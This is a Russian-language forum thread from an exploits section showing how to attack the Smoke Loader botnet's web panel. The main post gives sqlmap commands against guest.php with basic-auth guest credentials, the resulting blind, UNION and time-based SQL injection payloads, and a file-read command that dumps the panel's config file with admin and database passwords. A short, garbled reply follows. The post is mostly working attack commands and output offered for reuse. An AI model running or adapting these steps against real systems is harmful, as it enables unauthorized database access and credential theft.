Smoke Loader SQL Injection

Тема в разделе "Exploits |:| Vulnerabilities", создана пользователем Хулиган, 24 дек 2012.

  1. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    152
    Код:
    root@localhoost:/opt/pentest/database/sqlmap#  ./sqlmap.py -u evilserver.com/directory/guest.php
    --auth-cred=guest:guest --auth-type=basic --dbms mysql --level 3
    --risk 3
    
    
    sqlmap identified the following injection points with a total of 278
    HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
         Type: boolean-based blind
         Title: MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)
         Payload: id=1 LIMIT 0,1 UNION ALL SELECT
    NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL
    RLIKE IF(2984=2984,0x4d7953514c,0x28)
    
         Type: UNION query
         Title: MySQL UNION query (NULL) - 13 columns
         Payload: id=1 LIMIT 0,1 UNION ALL SELECT
    NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL
    LIMIT 0,1 UNION ALL SELECT
    NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a71616c3a,0x467173496b71686b617a,0x3a7269703a),NULL,NULL,NULL,NULL,NULL#
    
         Type: AND/OR time-based blind
         Title: MySQL > 5.0.11 AND time-based blind
         Payload: id=1 LIMIT 0,1 UNION ALL SELECT
    NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL
    AND SLEEP(5)
    Then:

    Код:
    root@localhoost:/opt/pentest/database/sqlmap#  ./sqlmap.py -u evilserver.com/directory/guest.php
    --auth-cred=guest:guest --auth-type=basic --dbms mysql --level 3 --risk
    3 --file-read=[smoke root directory--can be found by sql errors on guest panel
    by replacing the above parameters with invalid data]/admin/inc/cfg.php

    Код:
    root@localhoost:/opt/pentest/database/sqlmap#  cat output/localhost/files/_var_www_smoke_admin_inc_cfg.php
    <?php
    
    $config["admin"] = "bla";                //admin login name
    $config["pass"] = "blabla";                //admin password
    
    $config["guest"] = "guest";                //admin login name
    $config["gpass"] = "guest";                //admin password
    
    $config["dbhost"] = "localhost";
    $config["dbname"] = "smoke";                //mysql database name
    $config["dbuser"] = "bla";                //mysql database username
    $config["dbpass"] = "meh";            //mysql databse password
    
    $config["interval"] = 600;                //interval for check online bots
    
    $OS = array
    (
         0 => "Windows XP",
         1 => "Windows 2003",
         2 => "Windows Vista",
         3 => "Windows 7",
         4 => "Other"
    );
    
    ?>
     
    24 дек 2012
    1 человеку нравится это.
  2. chimchoca7
    chimchoca7 Новичок
    Симпатии:
    0
    SQLI уязвимости довольно длинные и их эффективной работы, благодаря
     
    26 авг 2013
Загрузка...